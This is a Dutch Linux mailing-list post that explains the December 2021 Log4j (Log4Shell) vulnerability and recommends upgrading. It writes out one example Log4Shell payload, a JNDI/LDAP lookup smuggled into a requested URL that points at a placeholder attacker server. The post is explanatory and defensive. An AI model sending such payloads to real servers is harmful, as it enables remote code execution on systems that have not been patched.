[linux] Apache probleem: wat moeten we doen?
Paul Slootman
paul+nospam op wurtel.net
Ma Dec 13 20:19:53 CET 2021
On Sun 12 Dec 2021, Daniel C. von Asmuth wrote:
>
> Nu moeten we ons vooral afvragen om welk probleem met Apache het gaat?
>
> Paai suggereert dat hij de web server bedoelt. Het probleem vind je op:
> https://httpd.apache.org/security/vulnerabilities_24.html
> Oplossing: upgraden naar Apache 2.4.51.
>
> Of gaat het om het probleem met Apache Log4j, dat gisteren de Volkskrant
> haalde? Veel Java server code is daar kwetsbaar voor:
> https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
>
> Oplossing: upgraden naar log4j-2.15.0-rc1.
Waar alle drukte om gaat de laatste dagen gaat inderdaad om de logging
tool voor java toepassingen.
Als er b.v. de opgevraagde URL in een java applicatie slordig gelogd
wordt (dus de URL wordt als log string gebruikt, ipv. een log string die
een externe string invoegt) dan kan daarmee externe bronnen ingevoegd
worden door b.v. http://example.com/${jndi:ldap://x.x.x.x:5555/ExploitD}/
op te vragen. log4j gaat dan vrolijk via ldap die x.x.x. enz. opvragen,
en als daar precies de juiste (foute) data klaarstaat dan kan je
applicatie dus dingen gaan uitvoeren waar je geen controle over hebt.
Ik ben (gelukkig?) geen java programmeur, maar bijzonder dat er
blijkbaar behoefte is aan een heel pakket om voor wat logging te zorgen,
wat in enorm veel java toepassingen ook gebruikt wordt. En dus bij
kwetsbaarheden enorme gevolgen kan hebben. Teveel toeters en bellen
ingebouwd? Waarom heeft een logging tool LDAP koppelingen nodig?!
Paul
Meer informatie over de Linux
maillijst